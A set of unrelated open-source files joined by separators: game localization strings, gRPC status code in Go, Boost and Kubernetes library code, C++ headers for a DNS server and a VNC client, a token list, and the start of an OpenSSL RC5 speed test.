avatar_m_shirt_teamrocket_0_bundle_icon
Camisa da Equipe Rocket
avatar_m_shirt_teamrocket_1_bundle_icon
Camisa da Equipe Rainbow Rocket
avatar_m_gloves_teamrocket_bundle_icon
Luvas da Equipe Rocket
avatar_m_pants_teamrocket_bundle_icon
Calça da Equipe Rocket
avatar_m_shoes_teamrocket_0_bundle_icon
Botas da Equipe Rocket
avatar_m_shoes_teamrocket_1_bundle_icon
Botas da Equipe Rainbow Rocket
avatar_f_belt_teamrocket_0_bundle_icon
Cinto da Equipe Rocket
avatar_m_hat_frlg_bundle_icon
Boné FireRed
avatar_m_shirt_frlg_bundle_icon
Camisa FireRed
avatar_m_backpack_frlg_bundle_icon
Mochila FireRed
avatar_m_gloves_frlg_bundle_icon
Pulseiras FireRed
avatar_m_pants_frlg_bundle_icon
Calça FireRed
avatar_m_shoes_frlg_bundle_icon
Sapatos FireRed
avatar_f_hat_frlg_bundle_icon
Chapéu LeafGreen
avatar_f_shirt_frlg_bundle_icon
Blusa LeafGreen
avatar_f_backpack_frlg_bundle_icon
Bolsa LeafGreen
avatar_f_gloves_frlg_bundle_icon
Pulseiras LeafGreen
avatar_f_pants_frlg_bundle_icon
Saia LeafGreen
avatar_f_shoes_frlg_bundle_icon
Sapatos LeafGreen
avatar_f_shirt_gymleader_bundle_icon
Blusa de Líder de Ginásio
avatar_f_gloves_gymleader_bundle_icon
Luvas de Líder de Ginásio
avatar_f_pants_gymleader_bundle_icon
Saia de Líder de Ginásio
avatar_f_shoes_gymleader_bundle_icon
Tênis de Líder de Ginásio
avatar_m_shirt_gymleader_bundle_icon
Camisa de Líder de Ginásio
avatar_m_gloves_gymleader_bundle_icon
Luvas de Líder de Ginásio
avatar_m_pants_gymleader_bundle_icon
Bermuda de Líder de Ginásio
avatar_m_shoes_gymleader_bundle_icon
Tênis de Líder de Ginásio
bundle.general4.small.1_title
Combo Dia Comunitário
avatar_f_shirt_earthday_2018_bundle_icon
Blusa Surfe Blue
avatar_m_shirt_earthday_2018_bundle_icon
Blusa Surfe Blue
bundle.general2.small.1.itembox_title
Combo de Itens (beta)
bundle.general2.medium.1.itembox_title
Combo de Itens prata (beta)
bundle.general2.large.1.itembox_title
Combo de Itens ouro (beta)
avatar_m_shirt_mew_bundle_icon
Camiseta de Mew
avatar_f_shirt_mew_bundle_icon
Camiseta de Mew
avatar_m_shirt_latias_latios_bundle_icon
Camisa de Latios e Latias
avatar_f_shirt_latias_latios_bundle_icon
Blusa de Latios e Latias
avatar_f_hat_pikachufan_bundle_icon
Gigolete Fã de Pikachu
avatar_f_shirt_pikachufan_bundle_icon
Blusa Fã de Pikachu
avatar_f_pants_pikachufan_bundle_icon
Short Fã de Pikachu
avatar_f_shoes_pikachufan_bundle_icon
Tênis Fã de Pikachu
avatar_m_hat_pikachufan_bundle_icon
Gigolete Fã de Pikachu
avatar_m_shirt_pikachufan_bundle_icon
Blusa Fã de Pikachu
avatar_m_pants_pikachufan_bundle_icon
Bermuda Fã de Pikachu
avatar_m_shoes_pikachufan_bundle_icon
Tênis Fã de Pikachu
avatar_f_glasses_teardrop_bundle_icon
Óculos escuros aviador
m_glasses_teardrop_bundle_icon
Óculos escuros aviador
item_golden_pinap_berry_desc
Dê esta fruta a um Pokémon para receber mais doces ao pegá-lo. Será mais fácil pegar Pokémon com ela.
item_golden_pinap_berry_name
Fruta Caxí dourada
avatar_f_shirt_celebi_bundle_icon
Camiseta de Celebi
avatar_m_shirt_celebi_bundle_icon
Camiseta de Celebi
avatar_m_hat_hgss_bundle_icon
Boné de Johto
avatar_m_backpack_hgss_bundle_icon
Bolsa de Johto
avatar_m_shirt_hgss_bundle_icon
Casaco de Johto
avatar_m_pants_hgss_bundle_icon
Calça de Johto
avatar_m_shoes_hgss_bundle_icon
Tênis de Johto
avatar_f_hat_hgss_bundle_icon
Boné de Johto
avatar_f_backpack_hgss_bundle_icon
Bolsa de Johto
avatar_f_shirt_hgss_bundle_icon
Blusa de Johto
avatar_f_pants_hgss_bundle_icon
Jardineira de Johto
avatar_f_socks_hgss_bundle_icon
Meias de Johto
avatar_f_shoes_hgss_bundle_icon
Sapatos de Johto
bundle.general5.small.1_title
Caixa de Evento
| {
"pile_set_name": "Github"
} |
/*
*
* Copyright 2017 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
// Package status implements errors returned by gRPC. These errors are
// serialized and transmitted on the wire between server and client, and allow
// for additional data to be transmitted via the Details field in the status
// proto. gRPC service handlers should return an error created by this
// package, and gRPC clients should expect a corresponding error to be
// returned from the RPC call.
//
// This package upholds the invariants that a non-nil error may not
// contain an OK code, and an OK code must result in a nil error.
package status
import (
"errors"
"fmt"
"github.com/golang/protobuf/proto"
"github.com/golang/protobuf/ptypes"
spb "google.golang.org/genproto/googleapis/rpc/status"
"google.golang.org/grpc/codes"
)
// statusError is an alias of a status proto. It implements error and Status,
// and a nil statusError should never be returned by this package.
type statusError spb.Status

// Error implements the error interface, rendering the code and message in the
// canonical "rpc error: code = ... desc = ..." form.
func (se *statusError) Error() string {
	p := (*spb.Status)(se)
	return fmt.Sprintf("rpc error: code = %s desc = %s", codes.Code(p.GetCode()), p.GetMessage())
}

// GRPCStatus wraps the underlying proto back into a *Status without copying.
func (se *statusError) GRPCStatus() *Status {
	return &Status{s: (*spb.Status)(se)}
}
// Status represents an RPC status code, message, and details. It is immutable
// and should be created with New, Newf, or FromProto.
type Status struct {
	s *spb.Status
}

// Code returns the status code contained in s.
// A nil Status (or one with no underlying proto) is treated as OK.
func (s *Status) Code() codes.Code {
	if s == nil || s.s == nil {
		return codes.OK
	}
	return codes.Code(s.s.Code)
}

// Message returns the message contained in s.
// A nil Status (or one with no underlying proto) yields the empty string.
func (s *Status) Message() string {
	if s == nil || s.s == nil {
		return ""
	}
	return s.s.Message
}

// Proto returns s's status as an spb.Status proto message.
// The proto is cloned, so callers may mutate the result freely.
func (s *Status) Proto() *spb.Status {
	if s == nil {
		return nil
	}
	return proto.Clone(s.s).(*spb.Status)
}

// Err returns an immutable error representing s; returns nil if s.Code() is
// OK.
func (s *Status) Err() error {
	if s.Code() == codes.OK {
		return nil
	}
	return (*statusError)(s.s)
}
// New returns a Status representing c and msg.
func New(c codes.Code, msg string) *Status {
	p := &spb.Status{Code: int32(c), Message: msg}
	return &Status{s: p}
}

// Newf returns New(c, fmt.Sprintf(format, a...)).
func Newf(c codes.Code, format string, a ...interface{}) *Status {
	msg := fmt.Sprintf(format, a...)
	return New(c, msg)
}

// Error returns an error representing c and msg. If c is OK, returns nil.
func Error(c codes.Code, msg string) error {
	return New(c, msg).Err()
}

// Errorf returns Error(c, fmt.Sprintf(format, a...)).
func Errorf(c codes.Code, format string, a ...interface{}) error {
	msg := fmt.Sprintf(format, a...)
	return New(c, msg).Err()
}

// ErrorProto returns an error representing s. If s.Code is OK, returns nil.
func ErrorProto(s *spb.Status) error {
	return FromProto(s).Err()
}

// FromProto returns a Status representing s.
// The input proto is cloned so the Status stays immutable.
func FromProto(s *spb.Status) *Status {
	clone := proto.Clone(s).(*spb.Status)
	return &Status{s: clone}
}
// FromError returns a Status representing err if it was produced from this
// package or has a method `GRPCStatus() *Status`. Otherwise, ok is false and a
// Status is returned with codes.Unknown and the original error message.
func FromError(err error) (*Status, bool) {
	switch e := err.(type) {
	case nil:
		// nil error maps to an OK status.
		return &Status{s: &spb.Status{Code: int32(codes.OK)}}, true
	case interface{ GRPCStatus() *Status }:
		return e.GRPCStatus(), true
	default:
		return New(codes.Unknown, e.Error()), false
	}
}

// Convert is a convenience function which removes the need to handle the
// boolean return value from FromError.
func Convert(err error) *Status {
	status, _ := FromError(err)
	return status
}
// WithDetails returns a new status with the provided details messages appended to the status.
// If any errors are encountered, it returns nil and the first error encountered.
func (s *Status) WithDetails(details ...proto.Message) (*Status, error) {
	if s.Code() == codes.OK {
		return nil, errors.New("no error details for status with code OK")
	}
	// s.Code() != OK implies that s.Proto() != nil.
	p := s.Proto()
	for _, detail := range details {
		// Pack each detail into a google.protobuf.Any so it can be carried in the proto.
		any, err := ptypes.MarshalAny(detail)
		if err != nil {
			return nil, err
		}
		p.Details = append(p.Details, any)
	}
	// p is a clone (from Proto), so the receiver itself is left unmodified.
	return &Status{s: p}, nil
}

// Details returns a slice of details messages attached to the status.
// If a detail cannot be decoded, the error is returned in place of the detail.
func (s *Status) Details() []interface{} {
	if s == nil || s.s == nil {
		return nil
	}
	details := make([]interface{}, 0, len(s.s.Details))
	for _, any := range s.s.Details {
		detail := &ptypes.DynamicAny{}
		if err := ptypes.UnmarshalAny(any, detail); err != nil {
			// Decoding failure: surface the error itself at this position.
			details = append(details, err)
			continue
		}
		details = append(details, detail.Message)
	}
	return details
}
// Code returns the Code of the error if it is a Status error, codes.OK if err
// is nil, or codes.Unknown otherwise.
func Code(err error) codes.Code {
	// Deliberately avoids FromError so the common OK/Unknown paths
	// allocate no Status value.
	switch e := err.(type) {
	case nil:
		return codes.OK
	case interface{ GRPCStatus() *Status }:
		return e.GRPCStatus().Code()
	default:
		return codes.Unknown
	}
}
| {
"pile_set_name": "Github"
} |
// Copyright Neil Groves 2009. Use, modification and
// distribution is subject to the Boost Software License, Version
// 1.0. (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
//
//
// For more information, see http://www.boost.org/libs/range/
//
#ifndef BOOST_RANGE_ALGORITHM_ADJACENT_FIND_HPP_INCLUDED
#define BOOST_RANGE_ALGORITHM_ADJACENT_FIND_HPP_INCLUDED
#include <boost/concept_check.hpp>
#include <boost/range/begin.hpp>
#include <boost/range/end.hpp>
#include <boost/range/concepts.hpp>
#include <boost/range/value_type.hpp>
#include <boost/range/detail/range_return.hpp>
#include <algorithm>
namespace boost
{
namespace range
{
/// \brief template function adjacent_find
///
/// range-based version of the adjacent_find std algorithm
/// (finds the first position where two consecutive elements compare
/// equal, or equal under the supplied binary predicate; returns the
/// end iterator when no such pair exists).
///
/// \pre ForwardRange is a model of the ForwardRangeConcept
/// \pre BinaryPredicate is a model of the BinaryPredicateConcept
template< typename ForwardRange >
inline typename range_iterator<ForwardRange>::type
adjacent_find(ForwardRange & rng)
{
    BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
    return std::adjacent_find(boost::begin(rng),boost::end(rng));
}

/// \overload
template< typename ForwardRange >
inline typename range_iterator<const ForwardRange>::type
adjacent_find(const ForwardRange& rng)
{
    BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
    return std::adjacent_find(boost::begin(rng),boost::end(rng));
}

/// \overload
template< typename ForwardRange, typename BinaryPredicate >
inline typename range_iterator<ForwardRange>::type
adjacent_find(ForwardRange & rng, BinaryPredicate pred)
{
    BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
    BOOST_RANGE_CONCEPT_ASSERT((BinaryPredicateConcept<BinaryPredicate,
        typename range_value<ForwardRange>::type,
        typename range_value<ForwardRange>::type>));
    return std::adjacent_find(boost::begin(rng),boost::end(rng),pred);
}

/// \overload
template< typename ForwardRange, typename BinaryPredicate >
inline typename range_iterator<const ForwardRange>::type
adjacent_find(const ForwardRange& rng, BinaryPredicate pred)
{
    BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
    BOOST_RANGE_CONCEPT_ASSERT((BinaryPredicateConcept<BinaryPredicate,
        typename range_value<const ForwardRange>::type,
        typename range_value<const ForwardRange>::type>));
    return std::adjacent_find(boost::begin(rng),boost::end(rng),pred);
}
// range_return overloads: these pack the iterator produced by
// std::adjacent_find into the range_return type selected by the `re`
// template parameter (e.g. found iterator, sub-range to/from the match).

/// \overload
template< range_return_value re, typename ForwardRange >
inline typename range_return<ForwardRange,re>::type
adjacent_find(ForwardRange & rng)
{
    BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
    return range_return<ForwardRange,re>::
        pack(std::adjacent_find(boost::begin(rng),boost::end(rng)),
             rng);
}

/// \overload
template< range_return_value re, typename ForwardRange >
inline typename range_return<const ForwardRange,re>::type
adjacent_find(const ForwardRange& rng)
{
    BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
    return range_return<const ForwardRange,re>::
        pack(std::adjacent_find(boost::begin(rng),boost::end(rng)),
             rng);
}

/// \overload
template< range_return_value re, typename ForwardRange, typename BinaryPredicate >
inline typename range_return<ForwardRange,re>::type
adjacent_find(ForwardRange& rng, BinaryPredicate pred)
{
    BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
    BOOST_RANGE_CONCEPT_ASSERT((BinaryPredicateConcept<BinaryPredicate,
        typename range_value<ForwardRange>::type,
        typename range_value<ForwardRange>::type>));
    return range_return<ForwardRange,re>::
        pack(std::adjacent_find(boost::begin(rng),boost::end(rng),pred),
             rng);
}
/// \overload
template< range_return_value re, typename ForwardRange, typename BinaryPredicate >
inline typename range_return<const ForwardRange,re>::type
adjacent_find(const ForwardRange& rng, BinaryPredicate pred)
{
    BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
    // Consistency fix: every other predicate overload in this header also
    // concept-checks the predicate; this one was missing the assertion.
    BOOST_RANGE_CONCEPT_ASSERT((BinaryPredicateConcept<BinaryPredicate,
        typename range_value<const ForwardRange>::type,
        typename range_value<const ForwardRange>::type>));
    return range_return<const ForwardRange,re>::
        pack(std::adjacent_find(boost::begin(rng),boost::end(rng),pred),
             rng);
}
} // namespace range
using range::adjacent_find;
} // namespace boost
#endif // include guard
| {
"pile_set_name": "Github"
} |
namespace CoreWCF.Description
{
    /// <summary>
    /// Indicates whether a message flows into an operation (Input)
    /// or out of it (Output).
    /// </summary>
    public enum MessageDirection
    {
        Input = 0,
        Output = 1,
    }

    static class MessageDirectionHelper
    {
        // True only for the two declared MessageDirection members;
        // guards against casts of arbitrary integers to the enum.
        internal static bool IsDefined(MessageDirection value)
        {
            switch (value)
            {
                case MessageDirection.Input:
                case MessageDirection.Output:
                    return true;
                default:
                    return false;
            }
        }

        // Maps Input to Output and Output to Input.
        internal static MessageDirection Opposite(MessageDirection d)
        {
            if (d == MessageDirection.Input)
            {
                return MessageDirection.Output;
            }
            return MessageDirection.Input;
        }
    }
} | {
"pile_set_name": "Github"
} |
#ifndef DNSServer_h
#define DNSServer_h
#include <WiFiUdp.h>
// DNS header QR flag values: query vs. response.
#define DNS_QR_QUERY 0
#define DNS_QR_RESPONSE 1
// OPCODE 0 = standard query.
#define DNS_OPCODE_QUERY 0
// Query class: IN (Internet) and the ANY wildcard.
#define DNS_QCLASS_IN 1
#define DNS_QCLASS_ANY 255
// Query type: A (IPv4 host address) and the ANY wildcard.
#define DNS_QTYPE_A 1
#define DNS_QTYPE_ANY 255
// 253 is the maximum printable length of a DNS name; 512 bytes is the
// classic maximum size of a UDP DNS message.
#define MAX_DNSNAME_LENGTH 253
#define MAX_DNS_PACKETSIZE 512
// DNS response codes (RCODE) placed in the header of replies.
// Values 0-5 follow the base DNS numbering; the remaining members extend it.
enum class DNSReplyCode
{
  NoError = 0,
  FormError = 1,
  ServerFailure = 2,
  NonExistentDomain = 3,
  NotImplemented = 4,
  Refused = 5,
  YXDomain = 6,
  YXRRSet = 7,
  NXRRSet = 8
};
// Wire-format DNS message header (12 bytes).
// NOTE(review): the bitfield layout matches the on-the-wire flag bytes only
// for this compiler's bit allocation on little-endian targets — confirm
// before porting to a different toolchain.
struct DNSHeader
{
  uint16_t ID; // identification number
  unsigned char RD : 1; // recursion desired
  unsigned char TC : 1; // truncated message
  unsigned char AA : 1; // authoritative answer
  unsigned char OPCode : 4; // message type
  unsigned char QR : 1; // query/response flag
  unsigned char RCode : 4; // response code
  unsigned char Z : 3; // reserved, must be zero
  unsigned char RA : 1; // recursion available
  uint16_t QDCount; // number of question entries
  uint16_t ANCount; // number of answer entries
  uint16_t NSCount; // number of authority entries
  uint16_t ARCount; // number of resource entries
};
// Lightweight UDP DNS server declaration: answers queries for the
// configured domain with a fixed IP address and otherwise replies with
// _errorReplyCode (implementations live in the .cpp).
class DNSServer
{
  public:
    DNSServer();
    ~DNSServer() {
      stop();                      // release the UDP socket on destruction
    };
    // Poll the UDP socket and answer the next pending DNS request, if any.
    void processNextRequest();
    // Set the RCODE used for queries that are not resolved to _resolvedIP.
    void setErrorReplyCode(const DNSReplyCode &replyCode);
    // Set the TTL value placed into answer records.
    void setTTL(const uint32_t &ttl);
    // Returns true if successful, false if there are no sockets available
    bool start(const uint16_t &port,
              const String &domainName,
              const IPAddress &resolvedIP);
    // stops the DNS server
    void stop();
  private:
    WiFiUDP _udp;                  // underlying UDP transport
    uint16_t _port;                // port the server listens on
    String _domainName;            // domain this server answers for
    unsigned char _resolvedIP[4];  // answer address stored as 4 raw bytes
    uint32_t _ttl;                 // TTL for generated answers
    DNSReplyCode _errorReplyCode;  // RCODE for non-matching queries
    // Normalize a queried name: lower-case it and drop a leading "www.".
    void downcaseAndRemoveWwwPrefix(String &domainName);
    // Send a positive answer carrying _resolvedIP for the given query.
    void replyWithIP(DNSHeader *dnsHeader,
                    unsigned char * query,
                    size_t queryLength);
    // Send an error response (with the original question echoed back).
    void replyWithError(DNSHeader *dnsHeader,
                        DNSReplyCode rcode,
                        unsigned char *query,
                        size_t queryLength);
    // Send an error response with no question section.
    void replyWithError(DNSHeader *dnsHeader,
                        DNSReplyCode rcode);
    // Parse a received packet and dispatch to replyWithIP/replyWithError.
    void respondToRequest(uint8_t *buffer, size_t length);
    // Write a 16-bit value to the UDP stream in network byte order.
    void writeNBOShort(uint16_t value);
};
#endif
| {
"pile_set_name": "Github"
} |
[Desktop Entry]
Type=Service
ServiceTypes=RazorDesktop/Plugin
Name=Hello World
Comment=Display rich text on the screen
#TRANSLATIONS_DIR=../translations
# Translations
Comment[eo]=Montri riĉan tekston ekrane
Name[eo]=Saluton, mondo!
| {
"pile_set_name": "Github"
} |
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by lister-gen. DO NOT EDIT.
package v1
import (
v1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/errors"
"k8s.io/apimachinery/pkg/labels"
"k8s.io/client-go/tools/cache"
)
// SecretLister helps list Secrets.
//
// Implementations are backed by a shared cache.Indexer (see
// NewSecretLister); List returns pointers straight out of that cache, so
// callers must not mutate the returned objects.
type SecretLister interface {
	// List lists all Secrets in the indexer.
	List(selector labels.Selector) (ret []*v1.Secret, err error)
	// Secrets returns an object that can list and get Secrets.
	Secrets(namespace string) SecretNamespaceLister
	// SecretListerExpansion allows custom methods to be added to the lister.
	SecretListerExpansion
}
// secretLister implements the SecretLister interface.
type secretLister struct {
indexer cache.Indexer
}
// NewSecretLister returns a new SecretLister backed by the given indexer.
func NewSecretLister(indexer cache.Indexer) SecretLister {
	lister := &secretLister{indexer: indexer}
	return lister
}
// List lists all Secrets in the indexer.
func (l *secretLister) List(selector labels.Selector) (ret []*v1.Secret, err error) {
	// Collect every cache entry matching the selector.
	collect := func(obj interface{}) {
		ret = append(ret, obj.(*v1.Secret))
	}
	err = cache.ListAll(l.indexer, selector, collect)
	return ret, err
}
// Secrets returns an object that can list and get Secrets in one namespace.
func (l *secretLister) Secrets(namespace string) SecretNamespaceLister {
	nsLister := secretNamespaceLister{indexer: l.indexer, namespace: namespace}
	return nsLister
}
// SecretNamespaceLister helps list and get Secrets scoped to one namespace.
type SecretNamespaceLister interface {
	// List lists all Secrets in the indexer for a given namespace.
	List(selector labels.Selector) (ret []*v1.Secret, err error)
	// Get retrieves the Secret from the indexer for a given namespace and name.
	Get(name string) (*v1.Secret, error)
	// SecretNamespaceListerExpansion allows custom methods to be added.
	SecretNamespaceListerExpansion
}
// secretNamespaceLister implements the SecretNamespaceLister
// interface.
type secretNamespaceLister struct {
	// indexer is the shared cache this lister reads from.
	indexer cache.Indexer
	// namespace restricts List/Get to one namespace.
	namespace string
}
// List lists all Secrets in the indexer for a given namespace.
func (l secretNamespaceLister) List(selector labels.Selector) (ret []*v1.Secret, err error) {
	// Collect every cache entry in this namespace matching the selector.
	collect := func(obj interface{}) {
		ret = append(ret, obj.(*v1.Secret))
	}
	err = cache.ListAllByNamespace(l.indexer, l.namespace, selector, collect)
	return ret, err
}
// Get retrieves the Secret from the indexer for a given namespace and name.
func (l secretNamespaceLister) Get(name string) (*v1.Secret, error) {
	key := l.namespace + "/" + name
	obj, exists, err := l.indexer.GetByKey(key)
	if err != nil {
		return nil, err
	}
	if !exists {
		// Mirror the API server's not-found error for a missing cache entry.
		return nil, errors.NewNotFound(v1.Resource("secret"), name)
	}
	secret := obj.(*v1.Secret)
	return secret, nil
}
| {
"pile_set_name": "Github"
} |
:ship:
| {
"pile_set_name": "Github"
} |
/* -*-c++-*- OpenSceneGraph - Copyright (C) 1998-2008 Robert Osfield
*
* This library is open source and may be redistributed and/or modified under
* the terms of the OpenSceneGraph Public License (OSGPL) version 0.0 or
* (at your option) any later version. The full license is in LICENSE file
* included with this distribution, and on the openscenegraph.org website.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* OpenSceneGraph Public License for more details.
*/
#ifndef OSGWIDGET_VNCCLIENT
#define OSGWIDGET_VNCCLIENT
#include <osgDB/ReaderWriter>
#include <osgWidget/PdfReader>
namespace osgWidget {
/** Pure virtual base class for VncImage that is subclassed by the vnc plugin to provide the actual implementation.*/
class VncImage : public osg::Image
{
    public:

        VncImage() {}

        /// Establish a VNC connection to the given host; returns true on success.
        virtual bool connect(const std::string& hostname) = 0;

        /// Close the active VNC connection.
        virtual void close() = 0;

    protected:

        /// Protected: instances are reference counted (held via osg::ref_ptr).
        virtual ~VncImage() {}
};
/** Convenience Vnc Client class that provides an interactive quad that can be placed directly in the scene.*/
class OSGWIDGET_EXPORT VncClient : public osg::Geode
{
    public:

        VncClient() {}

        /// Construct and immediately connect to the given host.
        VncClient(const std::string& hostname, const GeometryHints& hints = GeometryHints());

        /// Take ownership of an existing VncImage and build the display quad.
        bool assign(VncImage* vncImage, const GeometryHints& hints = GeometryHints());

        /// Connect to the given host; returns true on success.
        bool connect(const std::string& hostname, const GeometryHints& hints = GeometryHints());

        /// Close the underlying VNC connection.
        void close();

    protected:

        osg::ref_ptr<VncImage> _vncImage;   // image backing the interactive quad
};
}
#endif
| {
"pile_set_name": "Github"
} |
9p
1441
103443
624
104421
m8cs44860wfj
oldreturnpath
fashioned
read
mass
failure
postfix
encodingutf8
httpwwwrolandtanglaocomcategoriessoapnxmlrpc
smtp
test
comicscomcomicsdilbertdailydilbertimagesdailydilbertheadermidbot
begin
alien
wasnt
resentmessageid
uswsflist1sourceforgenet
clientip8219575100
account5
httpwwwquicktopiccomboinghk9nshvkkrrxi
autolearnham
in
switched
your
slip
internal
returnpath
mailtodebianuserlistsdebianorg
point
fffsecuritya
too
bay
subject
networks20
path
manuscripts
piles
using
469
email
listunsubscribe
yes
fundamentalsbrbyahoo
jmjmasonorg
but
goto
11
0000
v15
below
debian
security
be67e6c8431
url
6541216221
ehmadscientistcom
yyyylocalhostnetnoteinccom
width3d45
online
radio
gldudebianuser2mgmaneorg
oct
fallback
required53
xacceptlanguage
opensourceeeethzch
startup
lairxentcom
domain
pollack
090803
primarily
had
pcie
re
cest
imprononcable1ldosubscriberldowhitelistmurphywrongword1
uttered
dynnjablerr0
recycling
httplistsapplecommailmanlistinfojavadev
every
61
0400
burst
idea
clean
required40
cline
114910
it
sun
xoriginaldate
demostrate
esmtp
bhwwap0brjmd4vhiueq8togmtcsztbrntweskbi1plk
141317
24
gmailid1280f785a65bb1c2
quotedemailtextrcvdinmultihopdsbl
1237
deliveredto
xmozillastatus2
35
disinterested
localhost
principle
as
80347440cc
butt
spfpass
well
offscreen
has
dateinpast12240992
messageid
10
height8td
gross
srchttphomecnetcombgif
b160f16f1e
organizing
spamassassintalkexamplesourceforgenet
httpxentcommailmanlistinfofork
or
comes
resentfrom
splitsabbr
fastest
a4rjf0nbhntpt6i8vq1c9cw17
340976951424841270571770256javamailrootmd01wowsynacorcom
groups
000021
they
aaaaaa
contenttransferencoding
framework
p05111a5bb9ae46820c6e66149496
alttech
textplain
127001
outlook
that
microsoftr
aaaaarpwkeg
to
purpose
ratwaregeckobuild
singledrop
now
you
web
know
utc
amavisdnew
sign
recently
resentdate
inreplyto
references
q2z951d34ac1004191247oa5db050v24437077ee2cbf9fmailcsminingorg
at
1
id
modules
port
forkexamplecom
on
ceo
peltonen
date
friends
tex
dunno
2010
strange
filetimeb59cf9f001c260c6
625
googlecom
by
20100507
then
anger
unsubscribe
even
client
listmasterlistsdebianorg
helo
via
ldowhitelist5
galilei
xbeenthere
gateway1messagingenginecom
back
0100
xamavisstatus
little
src3dhttpwwwcnetcombgif
not
listsubscribe
102239978
with
from
gasp
still
mailtodebiankderequestlistsdebianorgsubjecthelp
20
mimeversion
heaven
wdd
outgoingsecurityfocuscom
af2sx6b92j091lhfioa9
hotline
use
listid
fetchmail590
xaccountkey
hdomainkeysignaturemimeversionreceiveddatereceivedmessageid
friday
sender
end
permitted
precedence
file
which
50abr
an
score7
original
7bit
be
listpost
reads
account
hyderabad
bits
shortduration
version250cvs
finds
guess
install
rtorvivsnlnet
7
repeatedly
benefit
bssiguanasuicidenet
mailtodebianuserrequestlistsdebianorgsubjectunsubscribe
81168116
none
pvb32
ccg2sjwadlbr
spam
013346
archive
writes
uptotheminute
some
tx
version325
bizsmtp
contenttype
may
secure
apollo
other
of
eskso0ztqm4e
mozilla
01
and
received
runtime
windows
wed
list
0031
usually
s0832016219710167
the
39b3016f22
only
freshrpms
| {
"pile_set_name": "Github"
} |
/* crypto/rc5/rc5speed.c */
/* Copyright (C) 1995-1998 Eric Young ([email protected])
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young ([email protected]).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson ([email protected]).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young ([email protected])"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson ([email protected])"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
/* 11-Sep-92 Andrew Daviel Support for Silicon Graphics IRIX added */
/* 06-Apr-92 Luke Brennan Support for VMS and add extra signal calls */
#if !defined(OPENSSL_SYS_MSDOS) && (!defined(OPENSSL_SYS_VMS) || defined(__DECC)) && !defined(OPENSSL_SYS_MACOSX)
# define TIMES
#endif
#include <stdio.h>
#include <openssl/e_os2.h>
#include OPENSSL_UNISTD_IO
OPENSSL_DECLARE_EXIT
#ifndef OPENSSL_SYS_NETWARE
# include <signal.h>
#endif
#ifndef _IRIX
# include <time.h>
#endif
#ifdef TIMES
# include <sys/types.h>
# include <sys/times.h>
#endif
/*
* Depending on the VMS version, the tms structure is perhaps defined.
* The __TMS macro will show if it was. If it wasn't defined, we should
